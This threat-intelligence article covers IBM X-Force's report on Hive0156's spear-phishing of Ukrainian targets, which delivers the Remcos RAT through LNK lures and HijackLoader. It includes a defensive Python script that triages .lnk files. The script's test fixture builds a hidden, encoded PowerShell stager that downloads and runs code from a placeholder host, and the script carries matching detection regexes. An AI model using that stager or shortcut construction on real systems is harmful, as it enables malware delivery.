Hive0156 attack chain | Image: IBM X-Force
IBM’s X-Force has raised the alarm on an intensifying series of cyberattacks orchestrated by the Russian-aligned threat group Hive0156. As of early July 2025, this sophisticated actor has been targeting Ukrainian government and military entities through a wave of spear-phishing campaigns that deliver the powerful Remcos Remote Access Trojan (RAT) via deceptively crafted Windows LNK and PowerShell files.
“Hive0156 is a Russian-aligned threat actor seeking to compromise individuals within the Ukrainian government or military,” stated IBM X-Force. “The group’s Tools, Tactics and Procedures (TTPs) strongly overlap with CERT-UA’s UAC-0184 actor.”
In the first half of 2025, Hive0156 weaponized emotionally and strategically charged decoy documents to lure Ukrainian military personnel into opening malicious attachments. These decoys included Excel and Word documents with filenames such as:
- uzagalnena_informacia_spisan_vtrat_33_ombr_100103.xlsx — Referencing the 33rd Mechanized Brigade’s wartime losses.
- Nakaz_shchodo_perevyrky_gotovnosty_1mehbat_14.07.2024.docx — A battalion readiness order.
- Pozicii_protivnika_zapad_i_yugo_zapad.xlsx — Containing supposed coordinates of enemy positions.
“The decoy is an unauthenticated functional Excel document with various metrics generally communicating the levels of various resources,” the report explains.
X-Force also noted a shift in lure themes during 2025: “As of mid-2025, X-Force is observing transliterated Ukrainian language decoy documents featuring themes related to ‘petitions,’ ‘official cover letters’ or ‘formal rejections’… a departure from the group’s emphasis on military themes.”
Hive0156’s current infection chain is short, but each stage is built to frustrate analysis and detection:
- Initial access. Targets receive either a .lnk or a PowerShell file that initiates contact with the group’s command-and-control (C2) infrastructure. Geofencing and header filtering let the operators decide which visitors receive the next stage, so analysts outside the targeted region may only ever see a decoy.
- HijackLoader deployment. The initial loader (also known as IDAT Loader) downloads a ZIP archive containing:
  - A legitimate, signed executable (PortRemo.exe)
  - Supporting and patched DLLs (Tools.dll, sqlite3.dll), a classic DLL side-loading setup in which the signed binary lends legitimacy while the patched DLL does the work
  - Obfuscated files, including shellcode and a malicious PNG (Churtseechang.vky, Weertijeegdoob.jm)
“The patched DLL will read and decrypt the first-stage shellcode… then decrypt the PNG file that contains HijackLoader components.”
- Remcos RAT execution. Finally, the decrypted components execute Remcos RAT with a selected set of modules. Its configuration is sparse, but it establishes a connection to Hive0156’s infrastructure and waits for operator commands.
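The first stage above hinges on a .lnk whose embedded command line launches PowerShell. The following triage helper, an added example rather than IBM X-Force tooling, parses the Shell Link format (per MS-SHLLINK) far enough to recover the target path and arguments, flags the hidden-window / encoded-command pattern, and decodes the `-EncodedCommand` payload. The two .lnk samples are constructed inside the script; the stager text, the `c2.example.invalid` hostname and the regexes are assumptions for illustration, not indicators from the report.

```python
"""Triage a Windows Shell Link (.lnk) and flag the LNK-to-PowerShell lure pattern.
Added example (not IBM X-Force tooling). Field layout follows MS-SHLLINK; the
sample .lnk bytes are constructed below, not recovered from a real campaign."""
import base64
import re
import struct

LNK_HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046} in its on-disk (mixed-endian) byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
# StringData blocks appear in this fixed order when their flag is set
STRING_DATA = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location")]


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the StringData fields (target path, arguments, ...)."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}  # 7 = SW_SHOWMINNOACTIVE
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    for flag, key in STRING_DATA:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        off += count * width
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields


# Assumed heuristics for this example: PowerShell launch, hidden/bypass switches, -EncodedCommand
POWERSHELL_RE = re.compile(r"(?:^|[\\/\s\"'])(?:powershell|pwsh)(?:\.exe)?\b", re.I)
HIDE_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|bypass", re.I)
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
REMOTE_RE = re.compile(r"https?://|downloadstring|downloadfile|\biex\b|invoke-expression", re.I)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of the script as UTF-16LE text."""
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def triage_lnk(data: bytes) -> dict:
    info = parse_lnk(data)
    cmd = " ".join(v for v in (info.get("relative_path"), info.get("arguments")) if v)
    result = {"command_line": cmd, "indicators": [], "decoded_command": None,
              "launches_powershell": bool(POWERSHELL_RE.search(cmd))}
    if result["launches_powershell"]:
        if HIDE_RE.search(cmd):
            result["indicators"].append("hidden window / profile or policy bypass")
        if info["show_command"] == 7:
            result["indicators"].append("SW_SHOWMINNOACTIVE (window starts minimised)")
        m = ENC_RE.search(cmd)
        if m:
            result["indicators"].append("encoded command")
            result["decoded_command"] = decode_encoded_command(m.group(1))
            if REMOTE_RE.search(result["decoded_command"]):
                result["indicators"].append("downloads and executes remote content")
    return result


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Encode a minimal Unicode .lnk with only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS (test fixture)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIqqqIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return header + body


# Constructed samples (assumptions, not Hive0156 artifacts); the stager only names a .invalid host
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage')"
MALICIOUS_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-nop -w hidden -ep bypass -enc " + base64.b64encode(_STAGER.encode("utf-16-le")).decode(),
    show_command=7)
BENIGN_LNK = build_lnk(r"..\..\Program Files\Windows NT\Accessories\wordpad.exe", "")

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(name, triage_lnk(blob))
```

Run it against a quarantined .lnk with `triage_lnk(open(path, "rb").read())`; the parser skips the LinkTargetIDList and LinkInfo blocks so it also works on shortcuts written by Explorer, and real lures frequently combine `show_command == 7` with a relative path that climbs out of the archive directory to reach powershell.exe, which is why both are reported separately.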
Originally designed as a legitimate remote administration tool, Remcos is now heavily abused by cybercriminals. IBM X-Force details its vast command set and configuration options:
- Remote shell and keylogging
- Webcam and microphone surveillance
- File exfiltration, clipboard capture, and screen recording
- Registry editing, browser data clearing, and even alarm playback
“Remcos may be used by legitimate system administrators; however, it is also heavily used by various malicious threat actors.”
X-Force observed campaign IDs like hmu2005, ra2005, and ra2005new, indicating multiple simultaneous operations.
Hive0156 maintains a global network of C2 servers, which X-Force attributes in part to lax abuse enforcement by hosting providers in Russia and elsewhere. The group’s use of geofencing, request filtering, and modular payload activation points to deliberate restraint: payloads go only to the intended targets, and the objective is durable access rather than noisy mass infection.